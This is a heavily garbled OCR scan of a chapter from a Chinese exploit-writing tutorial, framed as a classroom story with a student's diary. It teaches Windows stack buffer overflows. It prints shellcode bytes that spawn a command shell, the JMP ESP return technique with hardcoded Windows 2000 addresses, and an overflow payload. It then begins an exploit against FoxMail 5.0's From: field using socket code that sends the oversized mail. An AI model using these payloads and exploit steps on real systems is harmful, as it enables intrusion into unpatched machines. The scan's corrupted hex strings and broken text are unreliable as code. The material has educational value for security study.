小 知识 : 


Windows 不 像 Unix 那 样 使 用 系统 调用 来 实现 关键 函数 。Windows 通 过 动态 链接 库 来 提供 系统 
KA, ЯЛЕ PME AIDI 


“system 4 Нтѕусгі.а!! (the Microsoft Visual C++ Runtime library) 提供 ， 所 以 要 想 执行 
system， 必 须 首先 使 用 LoadLibrary(“msvcrt.dll”); 装载 动态 链接 库 msvcrt.dll， 之 后 才能 调用 
system 酌 数 。” 


“OK， 我 们 执行 ， 看 看 效果 吧 ! 弹出 一 个 DOS 对 话 框 ! 如 图 1 一 6， 可 以 执行 dir、copy 等 命 
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[PP 
ja sag * S3 6 2 c [rm S аын "| n 
[бюз — — =n giobai members| omin а-ә 


га] =] | Hinclude <uindous.h> 






































int main() 

( 
LoadLibrargy("msucrt.d11'); 
system( command com); 


return B; 


*5 Command Prompt 


MNicrosoftR» Windows DOS 
CCGopyright Microsoft Corp 1996-1999. 


F:SSTUDYVS "potr tiln > 











Ln 9, Col 2 HEC |COL |OVR (READ 


“乌拉 ， 太 神奇 了 1 "大 家 一 片 欢腾 ， 都 觉得 不 可 思议 。 


呵呵， 现在 我 们 把 程序 改 为 机 器 码 ， 可 能 你 们 过 去 也 看 到 过 ， 别 人 的 程序 中 有 很 多 诸如 
\XO1\xfRAx3fxff 一 类 的 东 东 ， 那 些 就 是 程序 的 机 器 码 。 也 把 我 们 的 程序 变 成 机 器 码 吧 ! ” 


“可 是 怎么 ЖЕ ШЕ 2 " 几 位 女生 有 些 疑 ER, 


“很 简单 ZME, “在 VC 中 按 F10 调 斌 ， 然 后 在 Debug 工 具 栏 中 点 击 最 后 一 个 按 
钮 'Disassemble’”， 这 样 束 出 现 了 源 程序 的 汇编 代码 ; 骨 在 代码 禄 口上 点 击 妃 标 右 键 ， 在 弹出 
菜单 中 选择 ‘Code Bytes"， 这 样 就 出 现 了 机 器 码 ， 如 图 1 一 71” 





o cmdåsm - E Ф С++ [break] - [Disassembly] 


JE xr dB 查看 ША 工程 Deu TR 窗口 #8 
| Gf | @ V (P 0 | e [БИ ШЕ] El [&п 


| [Globals] -] [All global members 
. ( 













6 
T: 
8: 
00101 028 
9: 

00101 0209 
18: 


00101 02В : 


11: 
003101 020 
12: 
AAA AZE 
13: 
00301 В2Е 
15: 
88581838 
15: 


nun m mas 


004380E88 
7FFDF 00G 
ШЫ 
DDN3 DDC 0 
КШ 
aagaaagag 
880581818 
BB12FF8h 


Gü 


Hi 


ГЕ ЖЖ LoadLibrary("msvcrt.dll"); 


Hi 


45 F4 


Nt Ft 


push ebp 


mou ebp,esp 


хо” рРах„ерРАах 


push eax 
push рах 
push eax 
mau byte 


HD 
mou byte 


53 


到 


shows or hides source annotation 


“ 哦 ， 那 我 们 把 它 抄 下 来 就 可 以 了 ? "古风 高 兴 的 说 道 ， 


CEE 






















push ebp 


i30 Та Source 





mou ebp,esp & Show Next Statement 
xüF гах „еах Ш Insert/Remove Breakpoint 
ҮШ Enable Breakpaint 

push Ed +} Run to Cursor 

push езх B Set Next Statement 

push aa Source Annotation 
ptr[ebp-8Ch],sDh M Code Bytes 

mou byte ptr [e X 
ptr[ebp-8Bh],53h 还 原 窗口 





mau hute ntr 


(locals À this | Á Watch2 ) Watch3 À Watch / | 


HEX LEE, 


' 不 ! "老病 阻止 到 ，* 其 实 还 要 作 相关 的 一 些 工作 之 后 才能 直接 抄 取 机 器 码 ，ShellCode 的 编写 
将 在 后 面 的 课程 中 讲 到 。” 


TR HAHAE, 


呵呵， 以 后 有 机 会 的 ， 大 家 先 这 么 认为 ShellCode 是 这 样 生 成 的 吧 ， 


遗憾 的 说 着 ， "我 不 怕 羊 吉 ， 不 人 做 毗 人 的 活 。” 


我 直接 给 大 家 一 个 开 


DOS 窗 口 的 机 器 码 。” 老 病 在 影 屏 上 打出 来 。 


char ShellCode[] = 


{ 


Ox8B,OxE5, 0x55,0x8B,0xEC,0x83,0xEC,0x0C,0xB8, 
Ox63, Ox6F, Ox6D, Ox6D, Ox6D, Ox6D, Ox6F, Ox63, 0x89, 
0x45, OxF4, OxB8, 0x61, Ox6E, 0x64, Ox2E, 0x89, 0x45, 
OxF8, OxB8, 0x63, Ox6F, Ox6D, 0x22, 0x89, 0x45, OxFC, 
0x33,0xD2, 0x88,0x55,0xFF, Ox8D,O0x45,0xF4, 
0x50, OxB8,0x24,0x98,0x01,0x78, OXxFF,O0xDO 


n 


老病 说 :“ 接 下 来 ， 我 们 把 这 些 背 


景 知识 连 起 来 ， 


写 一 个 真正 的 利用 程序 1 ” 


1.5 2: $3 — BE — — AK Hb 2£ HX HB fj 3€ FH 
“首先 ， 我 们 分 析 一 下 现在 拥有 的 资源 。” 


“1. 我 们 知道 了 “有 问题 程序 "返回 点 的 精确 位 置 ， 蕊 思 束 是 我 们 可 把 它 宪 盖 成 任意 地 址 ， 让 计算 
机 执行 那个 地 址 的 代码 。” 


“2 我 们 有 了 ShellCode (一 个 可 以 提供 DOS 窗 口 的 代码 ) 。” 
“3. 那 接 下 来 ， 大 家 想 想 ， 我 们 应 该 做 什么 呢 ?” 
(四 "同学 们 陷入 了 沉思 。 


宇 强 紧 锁 眉头 ， 突 然 灵 感 一 完 ， 说 道 : “莫非 把 "有 问题 程序 ' 的 返回 点 地 址 宪 芒 成 我 们 
ShellCode 的 地 址 ? ” 


"Very Good ! 这 三 步 束 是 缓冲 区 浴 出 攻击 的 基本 原理 和 精髓 1 ” 


1.5.1 ShellCode 的 定位 


老病 说 :“ 现 在 我 们 有 了 前 两 步 ， 返 回 点 定位 和 ShellCode 的 编写 ， m 
把 返回 点 必 盖 成 ShellCode 的 地 址 ， 就 可 成 功利 用 缓冲 区 洽 出 了 上 





“哈哈 ， 太 好 了 1 ? 玉 波 的 口水 都 要 流出 来 啦 .…… 
“现在 的 问题 束 是 : ShellCode 所 在 地 址 是 多 少 呢 ? 即 我 们 把 返回 地 址 覆盖 成 多 少 ?” 
КӨП шыу, 好 像 不 好 办 啊 .…… 


虽 ， 在 以 前 很 多 朋友 提出 了 不 少 方法 来 定位 ShellCode， 但 都 不 精确 。 随 着 技术 的 发 展 ， 
ae spyrit AKA Barnaby Jack 提 出 了 一 个 天 才 的 想法 : APR 令 来 完成 
跳 转 【 这 一 扩 巧 开创 了 一 个 新 新 的 Windows 缓 冲 区 浴 出 思路 上 


小 知识 : 
过 去 (尤其 是 在 Unix 下 ) ， 提 出 过 的 履 功 方法 主要 有 两 种 : 


1.NNNNNNNNNSSSSSSSSSSSRRRRRRRRRRRRRR 型 。 适 合 于 大 缓冲 区 ，“N” 代 表 空 指 
令 ， 也 就 是 0x90， 在 实际 运行 中 ， 程 序 将 什么 也 不 做 ， 而 是 一 直 延 着 这 些 NOPS 运 行 下 去 ， 
直到 遇 到 不 是 NOPS 的 指令 再 执行 之 ;“S” 代 表 ShellCode ;“R" 代 表 履 盖 的 返回 地 址 ， 思 路 是 
把 返回 地 址 RR 覆盖 为 nops 的 大 概 位 置 ， 这 样 就 会 跳 到 Nop 中 ， 然 后 继续 执行 ， 直 到 我 们 的 
ShellCode 中 。 但 这 种 方法 由 于 定位 不 准确 ， 所 以 使 用 起 来 也 不 准确 。 


2.RRRRRRRRRRNNNNNNNNNNNSSSSSSSSSS 型 。 是 用 大 量 的 “R” 填 满 整 个 缓冲 区 ， 然 
后 大 量 的 Nop， 最 后 是 ShellCode。 这 里 , “R” 往 后 跳 到 Nop 中 ， 绸 顺 看 往 下 执行 束 会 到 
ShellCode 中 。 但 在 Windows 下 , “R" 中 必定 会 含有 0， 这 样 ， 整 个 构造 束 会 被 截断 ， 只 能 用 于 
Unix 中 。 


Windows 的 系统 核心 dl 包括 kernel32.dll、user32.dll、gdi32.dll。 这 些 dll 一 直 位 于 内 存 中 ， 而 
且 对 应 于 国定 的 版 本 ，Windows 加 载 的 位 置 是 固定 的 。 


老病 继续 说 : “我 们 来 看 看 在 Windows 下 如 何 利 用 系统 核心 dl 里 的 指令 来 完成 跳 转 吧 。 我 们 用 
系统 核心 dll 中 的 jmp esp 地 址 来 履 盖 返回 地 址 ， 而 把 ShellCode 紧 跟 在 后 面 ， 这 样 就 可 跳 转 到 
我 们 的 ShellCode 中 。 其 利用 格式 是 NNNNNNRSSSSSS, N=Nop，S=ShellCode，R= 
jmp esp 的 地 址 ” 


同学 们 急 了 :“ 等 一 下 ， 为 什么 用 JMP ESP 的 地 址 覆盖 就 可 以 跳 到 后 面 的 ShellCode 中 呢 ?; 


“这 里 是 关键 的 地 方 ， 理 解 了 这 个 融 理 解 了 整个 缓冲 区 浴 出 攻击 І 下面 是 详细 的 讲解 ， 大 家 注 
意 跟 上 。 你 们 看 ， 宪 盖 后 的 缓冲 区 如 图 1 一 8 所 示 : М7 МОР, 1/8 ЕІРВЈЊ 5 68 Г 
JMP ESP 的 地 址 ， 接 下 去 的 'S0'、'S1' 等 表示 ShellCode 开 始 的 0 字 节 、1 字 节 等 。” 


ОЛ zx HX G ДЕ 


` ль ` 
“п, 这 个 没有 iv] ЖИЙ o ” 


老病 说 : KATTEE, 


癌 Ret 指 分。 如 图 1-9。” 


1.5.1 ShellCode 的 定位 





要 返回 时 堆栈 指针 ESP 会 指向 保存 原 EIP 的 地 方 ， 而 指 全 指针 EIP 指 
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POP EBP 





“Ret? Ret 是 什么 ?? 有 人 问 道 。 


“Ret 相 当 于 Pop EIP ， 束 是 把 栈 顶 指针 ESP 指 向 的 值 弹 出 来 给 EIP。 所 以 在 正常 情况 下 ，Ret 
执行 后 ， 就 可 把 原来 的 EIP 恢 复 ， 从 而 回 到 中 断 前 的 流程 。” 


“ 哦 | » 


“但 是 ， 保 存 的 EIP 已 经 被 我 们 履 盖 成 JMP ESP 指 使 的 地 址 了 。 这 样 执行 Pop EIP JE, EIPZ 
被 改 为 JMP ESP 的 地 址 ， 即 指向 JMP ESP, 而 堆栈 指针 ESP 往 下 移 一 位 ， 指 向 ShellCode 的 
第 一 个 字 节 〈 即 图 1-9 中 的 'S0) 了 。 如 图 1-10。” 
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“计算 机 不 知道 我 们 做 了 手脚 ， 继 续 往 下 执行 EIP 指 向 的 指令 一 JMP ESP， 而 ESP 指 向 的 
是 '‘S0'"， 这 样 束 JMP 到 了 ‘SO 中， 开始 执 行 我 们 的 ShellCode 了 |【 如 下 图 1-11。” 


1.5.1 ShellCode 的 定位 


34 


ОЛ zx HX G ДЕ 





小 知识 : 


EIP 指 今 指针 指向 下 一 条 要 执行 的 命令 ， 一 般 会 自动 加 1。ESP 堆 栈 顶 指针 指向 堆栈 的 顶部 。 
在 PUSH 时 ，ESP 往 上 走 ， 减 1 ; 在 POP 时 ，ESP 往 下 走 ， 加 1。 


JE ! 有 点 感 党 了 ， 但 还 不 是 非常 清楚 。” 


“我 再 用 具体 的 数字 重复 一 下 这 个 过 程 吧 | ”老病 耐心 的 讲解 道 ，“FF E4’ 是 JMP ESP 的 机 器 
码 ， 而 在 Windows 2000 SP2 下 ， 地 址 0x77e0492b 里 正好 就 是 FF E4'。 所 以 我 们 用 
Ox77e0492b ( 即 JMP ESP 指 使 的 地 址 ) 来 覆盖 保存 的 EIP， 如 图 1-12。” 
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ЧЕ. 
0x77e0492b: ЕЕ E4 





“ 当 程 序 返回 时 ， 执 行 Реі= РОР EIP, ЕР 7 FPXOx77e0492b f, ШЕЅР{ КЖЕ, #5 
ShellCode 的 第 一 个 字 节 中 ， 如 图 1-13。” 


ZI 


EIP —> 0x77e0492b: FF E4 





“系统 不 知道 我 们 做 了 手脚 ， 继 续 执行 。 执 行 EIP 指 向 的 指令 ， 就 是 'FF E4'， 即 JMP ESP. 而 
此 时 的 ESP 指 向 后 面 ShellCode 的 第 一 个 字 节 ， 执 行 'FF EP (ВПШМР ESP) WE AEIR 
们 的 ShellCode 中 啦 ! "老病 万 般 耐 心 的 说 道 ， 生 怕 大 家 有 一 点 不 懂 。 


“下 来 大 家 再 仔细 想 想 ， 多 看 看 上 面 的 图 和 讲解 。 我 们 先 实际 感受 一 下 。” 


1.5.2 成 功 构造 利用 


老师 说 : 3x BJMP ESP 的 地 址 ， 会 由 于 版 本 的 不 同 而 不 一 样 。 比 如 在 Win2000 的 User32.dll 

中 ，JMP ESP 指 今 的 地 址 分 别 为 : sp0:0x77e2e32a, sp1:0x77e8898b, sp2:0x77e0492b, 

sp3:0x77e188a7、sp4:0x77e22c75。 以 前 很 多 攻击 利用 程序 需要 带 上 对 方 版 本 的 参数 ， 丈 是 
这 个 原因 。” 


“I | » 


“Н K BJ HE, ЖЖЖ s, I РВ ВУЙЫН, iE. DUTEREBJAL— DU 3X Em 
了 很 大 提高 。 从 这 里 可 以 看 出 ， 技 术 是 不 断 发 展 进 步 的 ， 如 果 目 己 有 什么 发 现 ， 一 定 要 公布 
出 来 ， 促 进 大 家 讨论 ， 反 过 来 也 促进 目 己 提高 ， 人 否则 技术 会 很 快 过 时 的 。 


大 家 都 点 点 头 。 
“好 了 ， 我 们 把 它们 综合 起 来 吧 ! 还 是 对 于 那个 程序 ， 我 们 把 它 履 盖 成 这 个 样子 。" 如 图 1-14。 


name[8] ebp RET ShellCode 


| | je | jen = 
AAAAAAAA AAAA осле 5555555 


“把 代码 合 起 来 ， 融 如 图 1-15 所 示 。 


har name| | = 
"1х4141х411х911х91" f/name[0]-name[3] 
"\х41\х#1\х41\х41" J/name[4]-name[7] 
"\х41\х#1\х#1\хФ#1"_ /lebn 
Ax6é4dixefixelix77" Г йр esp hl. JEsp2.ER de hr 77elaf64! 
{ЙЫ T &shellcede 开 dos 窗 口 
"теа, dir, „ылы. 
"Cód бубе рСераБ рғ 3 C6 45bF abS2ixC bt SF S46 letShs 
EAIX2 


ЕВ dd C6 SEE e C Ix C6 Tx45xEDVx4CixBAT541xA2" 
"\хЕб\х7Л\х52\хВО\х45\хЕ4\х50" 
РЕБРО 
"\х55\хВВ\хЕС\хӨЗ\хЕС\х2С\хВВ\>&3\>®Е\х6р\х6р\хВ9\х45\хЕ4\хВВ\хб1\хбЕ\хб4\х 
2Е" 
"х89\х454хҒ8{хВ8{х63\х6\х60х22(х89ра50А0х33(х02\х88\х5ғЕ\х80\х450х 
Fd4 
"үх504хВ8{х4а\хӘБ\хо1\х78\Е\хрО"; 
“ЖЖ, ЭЛЕЕ РЕ пате pk iy #88. Бажа, (8245211600872 Ж. 
RAT, MAF HARSEBUDOSx1:68E f ! ” 


“Хж®а, Бтаіп 8125 я, fq 4iname3tamoutputZizB, TRARAS AER: 
到 ‘name’ 数 组 中 会 隐藏 这 样 精心 构造 的 悉 意 代码 ; 对 于 任何 的 "name'， 他 都 会 把 它 读 人 并 作为 
正常 的 东西 处 理 ， 但 会 出 现 想 不 到 的 结果 ， 了 呵呵 1 如 图 1-16。 





‚ over - AEP yC ++ - [over.cpp *] ` 二 | 本 | x 
| 四 文件 dus 查看 fA 工程 Ga ТА 窗口 ий -1|#| х 


ë =; IG | Ba m | =-=- [m mu |a [pina "| in 
[t [Globals] || [All global members =|| Ф main z m = |e Ë3 x * xL M 


—— — a] хј char name[] = 
[ E3 over : "AXPIR AFIAT" . //name[8HB]-name[.:] 
| UAXAHTAXATXXATXxXA1"  /,/name[45]-name[ 7] 
UXAXHTXAEXRTXEXRTXXA1" Te == ebp 
"Ax6SXXaFNxe ix7 7" AME Im esp 的 地 址 ， 在 sp2 上 的 地 址 77e1laf6at 





I» | 


UAXBBAXBBXXEDXXSSXXEUNX5 D x5DVx5gmxC6x55*sxFANXBRDXXDCOXXhS5NxXEP5RXX5SU 
FE 
DC 

"AKEDA S77 AADA DN FN 

"AxFFXAx55XxFU'" 
UAxSSAXBBAXECSEXSSSXECNEZCSEEBRSxX63NEGFSx6DSxóDS8OXxH5SxFhRXXBRXXÓTN КБЕХ АЦА Х2Е"" 
"AXBÜUXXRISSXESXVXRBBSXXOJNXOFNXO6DXR22xXBOXXEUSSVECSXS32XXD2X88XX5SXVREFFXXBSDXEXISSNEER'* 
хо UXxBBXxtaNxODNx dlNx/AZSXXFFSRDU'z 


int : = Command Prompt 
ln nainí) MicrozsoftiüH» Windows DO51**Hx41*Bx41H«41 
К (CCopyright Microsoft Corp 1990-1999. 


char output[8]; _ ws 
F:sSSTUDYS почетно 

strcpu(output, name); 
For(int i-8;i£B8&&output[i];i**) 
printF("XVXBx$x" ,output[1]); 


return B; 





FAstu "NUT eer ver. cpp saved 


ПІ 


XXE, RMR Т ААЛ Рр h ВЈ У. ! 


А? 有 收获 没有 ?>” 


ro, 


[5841958 : “8 ! 不 错 不 错 1” 


VENE RARE Т 下 节 课 我 们 将 进入 Windows 漏 洞 的 缓冲 区 浴 出 利用 编写 了 。OK， 今 天 束 到 这 
里 ， 放 学 1 ” 





1.6 小 结 摘 目 小 强 的 日 记 


9H16H BH 
军训 完 后 ， 大 学 正式 生活 已 开始 一 星期 了 ， 目 己 也 从 最 初 的 新 鲜 逐 渐 走 向 了 适应 。 


学 校 很 大 ， 还 有 几 个 分 校区 ， 和 同学 转 了 几 天 后 才 基 本 熟悉 本 部 的 情况 。 寝 室 在 学 校 中 心 ， 
周转 是 几 个 食堂 。 食 营 和 教学 楼 之 间 有 一 个 篮球 场 ， 复 球场 芳 边 有 一 排 乒乓 果 ， 永 远 都 排 满 
了 人 在 打球 。 图 书馆 则 比较 远 ， 要 越过 篮球 场 ， 路 过 一 个 足球 场 ， 并 走 过 一 个 绿化 很 好 的 章 
坪 ， 直 到 校门 口 的 边 上 才 到 。 


我 平时 住 被 宇 ， 周 末 才 回 家 。 大 一 的 课 比 较 多 ， 基 本 上 排 满 了 ， 每 门 课 我 都 认真 听 ， 但 内 容 
基本 都 很 无 聊 ， 有 的 老病 全 按 书 本 上 的 知识 讲 ， 一 点 儿 也 不 和 社会 知识 接轨 ， 有 的 老病 经 常 
ш, Б Е. Вл, АВЛА, Ял Аав. 


但 有 一 门 ' 网 络 攻 防 ' 的 课 还 比较 有 意思 ， 那 个 老病 好 像 姓 王 。 王 老病 不 看 讲义 ， 思 维 活 跃 ， 随 
时 都 能 调动 我 们 思考 。 他 居然 用 投 硬 币 来 决定 讲 缓冲 区 浴 出 编程 ， 呵 呵 ! 真是 有 意思 。 


上 次 课 ， 王 老 症 讲 了 缓冲 区 浴 出 编程 的 基本 原理 和 步骤 ， 我 觉得 还 是 比较 清楚 ， 而 且 他 还 对 
一 个 有 漏洞 的 程序 通过 精心 构造 数据 、 改 变 程序 流程 ， 漳 出 了 一 个 DOS 窗 口 。 回 家 后 在 自己 
的 机 器 上 照 着 做 了 一 通 ， 成 功 了 | 我 的 兴趣 一 下 仆 提 起 来 了 ， 和 希 蛙 再 看 看 实际 中 的 利用 。 王 
老病 说 下 次 课 将 进入 实际 漏洞 的 编写 ， 自 己 很 兴奋 ， 盼 着 下 次 课 早 点 到 来 。 


190306, ЕУ (АЩ Е, ААРА), Вн; 还 有 一 位 叫 古 风 ， 很 勤奋 
的 人 。 还 看 到 了 一 位 穿着 绿色 薄 毛 衣 的 PLMM， 留 着 短发 ， 很 清秀 的 脸 。 她 坐 我 前 面 不 远 的 地 
方 ， 我 看 了 她 几 次 ， 她 一 和 直 在 认真 听课 ， 真 是 一 个 美丽 又 勤奋 的 女孩 。 


给 偶遇 的 女孩 

五 百年 前 的 回眸 ， 

换 来 今世 的 探 肩 而 过 ; 

你 在 世界 的 这 头 ， 我 在 世界 的 那 头 ， 
815. 

一 闭 眼 ， 全 是 你 的 模样 。 

想像 着 你 ， 在 操场 上 ， 在 课 桌 前 ， 在 寝室 里 。 
— Жа, 


所 谓 伊 人 ， 在 水 一 方 。 
下 次 课时 ， 再 和 她 相 见 吧 ! 


1.7 首次 实战 一 一 FoxMail 洽 出 漏洞 编写 


“早晨 起 床 ， 铃 儿 响 啊 ， 叮 叮当 当 上 学 昔 "。 老 病 一 边 哼 着 歌 ， 迈进 教 军 。 


"EE 1 " 老 评 大 叫 一 声 。 原 来 看 见 更 多 的 同学 坐 得 整整 齐 齐 ， 老 羡 呈 了 一 跳 ,，" 我 还 以 为 走 错 了 
di see ! ' 


大 家 都 笑 了 。 于 强 看 见 PLMM 这 次 穿 了 件 淡 黄 的 外 套 ， 坐 在 他 雹 边 的 第 四 个 位 子 。 


“者 评 ， 上 次 讲 了 缓冲 区 浴 出 后 ， 大 家 下 来 都 对 其 产生 了 浓厚 的 兴趣 ， 也 希望 能 继续 学 习 实 际 
ж HR PCS 使 出 漏洞 的 编写 。 "古风 认真 的 说 道 。 


“ 哦 ， 是 这 样 啊 ， 没 问题 ， 真 正 的 黑客 精 伸 融 是 交流 和 共享 ! 有 更 多 的 人 参与 ， 融 会 激发 出 更 
多 的 思想 ， 大 家 也 就 会 一 起 进 井 步 。 I 


“有 一 点 我 要 再 三 强调 ， 束 是 有 什么 技术 发 现 ， 一 定 要 公布 出 来 ， 别 人 可 以 在 此 基础 上 有 更 好 
的 发 现 ， 目 己 也 可 获得 很 大 的 收益 ; 而 如 果 只 是 自己 用 ， 拷 术 本 身 会 很 快 过 时 。 大 家 记 住 了 
оп 0” 


“ 记 住 了 ! "教室 里 齐 声 答 道 。 

“好 ， 从 现在 起 ， 我 们 就 进入 真正 的 Windows 平 台 下 缓冲 区 浴 出 漏洞 的 编写 1” 
“好 哦 ! "一 阵 欢 呼 ! 

“我 们 从 易 至 难 进 行 ， 特 次 实战 对 象 融 是 FoxMail 的 漏洞 ! "老病 说 道 。 

小 知识 : 


FoxMail 是 国内 著名 的 Internet 电 子 邮 件 客户 端 软 件 。 可 以 到 其 主页 www.FoxMail.com.cn 获 得 
最 新 的 信息 ¿NO 


"EE | 第 一 个 就 选 这 么 难 的 啊 ? 3241186470 ? "一 些 同学 说 道 。 

“呵呵 ， 其 实 有 了 上 堂 课 的 知识 ， 要 利用 该 漏洞 实在 是 小 菜 一 碟 。" 老 病 轻 松 的 说 道 。 
“ 哦 ! 是 不 是 哦 .…...”" 大 家 都 有 些 担心 。 

“绝对 没 问 题 ! Follow me ! 首先 让 我 们 看 看 漏洞 公告 吧 !” 


1.7.1 3:8] 4S E BJ 43 T 


后 ， 首 先 要 注意 是 什么 程序 、 它 的 什么 版 本 有 漏洞 。 从 图 1-17 可 
FoxMail5.0 beta2 和 FoxMail5.0， 那 我 们 就 安 
这 里 我 用 的 是 Win2000 SP2+FoxMail5.0 


“大 家 拿 到 任何 一 篇 漏洞 公告 后 
以 看 出 ， 有 问题 的 的 版 本 是 FoxMail5.0 beta1、 
装 上 相应 的 版 本 ， 写 出 对 它 的 洽 出 攻击 程序 。 
beta1。 





AAAAAAAA АААА ос 5555555 


“漏洞 公告 还 会 给 出 大 概 的 问题 分 析 。 图 1-17 就 说 到 了 ， 有 问题 的 东 东 是 punylib.dll。 安 装 了 
FoxMail 后 ， 我 们 可 以 在 安装 目录 的 3rdParty 子 目录 下 发 现 它 ， 大 家 看 1 "如 图 1-18。 


= D| xi 








XO STR) ЖЕ) ФА) ILIAD ЯН) 





а D 


a PunyLib.dll PunyLib.idb 


[3 
[+- 8 sys (C:) 
EF ==) TOOLS (О) 
由 -| 器 Adobe 
由 +-{ `] Borland 
{С EditPlus 2 
8-2 FlashGet 
HC ie Foxmail 
X 3rdParty 
C Address 
CJ AntiSpam 
“人 cryptdll 


:| 1-8 ок 
3 To (АЈ SIBI: 7.20 GB) 557 КВ 
“ЖЖ, А ta — HR XE PA H ЖЫЛУ А КЕК J Fak, і ИЕЛЖ Т, (НЕ 
平时 生活 中 ， 大 家 一 定 要 重视 ， 这 可 是 安全 的 保证 哦 1” 


当然， 漏洞 公告 是 不 会 给 我 们 说 如 何 利用 漏洞 的 。 所 以 除了 坦 看 漏洞 公告 ， 我 们 还 要 查找 其 
他 人 或 安全 组 织 的 相关 漏洞 分 析 报 告 。 比 如 root 关 于 FoxMail 漏 洞 的 分 析 ， 如 图 1-19。 





k=) 我 的 电脑 2 


ARAH- -www.nsfocus.com- E H Til - Microsolt Internet Explorer 







TD SED FEW BEW IAD FAH в pwy 
еке -小 -加 а 2 днк mmr нй QƏ|E- 3 - = & @ Ü 
Hip) [E] Ework F omahe En ER Mail HET Root. tm DES mu 


| 





Foxmail ЗЕ РЕВ БИ 


ТЕЗЕ : root (webmaster at хЁосих, org) 
ist : http ` waww, xÉocuz net/articlez/TÜU0403/683,. html 
日 期 2004-04-07 


RERNE : 2004-03-22 更 新 时 间 : 2004-03-22 
Жер: ПШ 
A EET : root (webmaster, at xfocus. org) 


A HOUttp: / iwaw, xfocus, nat? 


(E : 订立 是 2004 年 >? 月 zfocas 成 员 在 内 部 技术 变 流 中 提出 的 ， Е dz. ЈЕ ВАДЕ КАЕ A mp, sre Hox — diei hl + 但 未 公开 骨节 ，xfocns 成 
MUTTE Fonai lT + ЕН ЭНЈАН СБА. z004zR3 H 18 EL EL URL Fre ne RERO MEER ТГ. 


ШП : winZk sp4tfoxnail 5.0. 300 


URAA Eoxmail 4. «ЗВТ ж Ez enti D eH] "TL Е — ТЕУТА ЗСА T I. а ЖЕГИР aai lB 9810 ғ (Ве ВНА 
WA. Ті ВЕЧЕРЕ АС, Wile RARR EE T o” A Г ТУТАНА, 


问题 出 在 FunyLib. a11 ЛАТ осал, Titi B — D HGESEERhRBBIEENREREEE. :4—EPBPEIEXDEAXThEBBETI. SAVER 
1171 оса НА “Frona: "” FRO ЖИЫ р EE. nj НАТТЫК, 


RHET : 

, text: 102040 public UrlloLocal 

, text; 10002040 VrlToLocal proc near ki 
ë) І Т EAE 


“好 了 ， 从 漏洞 公告 和 分 析 中 ， 我 们 可 以 知道 ， 是 FoxMail 在 处 理 From: 字 段 时 允许 的 长 度 超过 
了 缓冲 区 分 配 的 长 度 ， 从 而 导致 了 缓冲 区 浴 出 。 以 上 的 大 家 都 能 理解 吧 ? "TE. 


“ 昌 。 但 如 何 写 该 缓冲 区 浴 出 漏洞 的 利用 程序 呢 ? "BRE АТ. 


“好 ， 融 让 我 们 依次 解决 上 节 课 上 说 的 三 个 条 件 ， 来 实现 对 FoxMail 漏 洞 的 利用 编写 。 首 先 复 习 
一 下 要 成 功利 用 缓冲 区 浴 出 需要 的 三 个 条 件 : 


1. 有 问题 程序 返回 点 的 精确 位 置 一 一 我 们 可 以 把 它 覆 盖 成 任意 地 址 。 
2.ShellCode 一 一 一 个 提供 给 我 们 想 要 的 功能 的 代码 。 

3.JMP ESP 的 地 址 一 一 把 返回 点 复 兰 JMP ESP 的 地 址 ， 这 样 可 跳 人 ShellCode。” 
“这 三 点 大 家 一 定 要 牢 牢 记 在 头脑 里 ， 这 是 标准 缓冲 区 挫 栈 浴 出 利用 的 标准 方法 |" 
同学 们 都 使 劲 的 点 点 头 

“来 ， 融 让 我 们 一 步 步 的 解决 需要 的 这 三 个 条 件 吧 1” 


1 7. 2 美妙 定位 X H =] 


“第 一 个 条 件 是 最 主要 的 : ‘有 问题 程序 "返回 点 的 精确 位 置 。 从 漏洞 公告 和 漏洞 分 析 中 我 们 可 以 
知道 ， 邮 件 的 'From: 字 段 太 长 就 会 覆盖 到 返回 地 址 ， 那 我 们 就 写 一 个 初步 的 浴 出 程序 框架 
FoxMail1.c， 来 逐步 定位 返回 点 的 位 置 。 这 个 程序 很 简单 ， 束 是 往 邮 箱 发 一 封 信 ， 而 且 只 

有 'From:' 字 段 。 不 要 小 看 这 个 框架 哦 ， 虽 然 简 陋 ， 但 我 们 会 在 此 基础 上 打造 出 最 终 的 梦幻 版 
本 。” 


[FoxMail1.c 请 参见 光盘 ] 


“在 程序 的 FoxMail1.c 中 ， 我 们 对 下 rom:" 字 段 进行 填充 。 因 为 不 能 超过 0x200 的 长 度 ， 所 以 我 
1] 先 填充 0x1 BOTAR IÑ o 


memset (buffer, 0x41, 0x150); 
sprintf (temp, "From: %s\r\n", buffer); 
send (sock, temp, strlen (temp), 0); 


“然后 执行 程序 ， 发 送 成 功 1" 如 图 1-20。 


fossils 


++- LT 


„О 封 新 邮件 






































































































ER 3 "ATE mE 
P rag [эшек dami 25A-PIPELINING 


FAST d E RH 

Z25H-RhUTH LOGIN PLAIN 
Рет ыа ые PLALN 
256 ВВІТМІМЕ 





E=] Workspace 'f 
= El foxmaill fi 
+] ї@хтай 
器- Externz 





Fprintf (stderr, "# send evil E-I 
ШКМ 一 一 一 一 一 一 一 一 一 一 
clear (temp); 

clear (buffer): 

memset {buffer, Bxh1, üx15H):; 
sprintf (temp, "From: $sXrkn", bi 
send люк, лар, strlen ATERPE: 
геа Ë 
clear (temp); 

sprintf (temp, ".XrXnquit*r*sn"); 
send (sock, temp, strlen (temp), 









334 U8Hlcm5hbuULU6 







334 UGFzc3duc I 







235 Huthentication succezztul 






25H Ok 





Fprintf (stderr, "# waiting cliel 
closesocket (sock); 






258 ОК 







354 End data ААН РА ЕУ. ОНЕ 





return H 





Й send ео11 E=mail . 
H waiting client receive mail. 


Press апу key ta continue 


“然后 我 们 用 FoxMail 接 收 邮 件 ， 大 家 看 图 1-21。” 


Foxmail [192.3.21 2] K | 
XR) AWD 查看 (WD ЖРД) ШЕРИМ) НЕЙ Б) ТАТ) EGO МИ ë 
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E 已 发 送 邮 件 箱 
—@ БИРЕ 
-E mitra 
E-8 122001 
E Iu 
- 发 件 箱 | | 
P- 已 发 送 邮件 箱 G) Access violation at address П2ЕА1ВАВ in module 'punylib,dl', Write of address 41414141 
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“=й | jl Ba EH Y ! '41414141 融 是 我 们 添加 的 A 啊 |” 
"pax | "教室 里 一 片 欢 腾 。 


“等 一 下 【1 ”老病 把 手 一 挥 ，“ 我 把 它们 列 出 来 ， 让 大 家 仔细 看 看 ， 和 上 节 课 的 报错 信息 对 上 比 一 
下 。 ^^ 


上 节 课 的 报错 信息 如 图 1-22。 





"发现 有 什么 不 同 了 吗 ? "老病 问 道 。 
“一 个 有 两 个 按钮 ， 一 个 只 有 一 个 按钮 .……. 
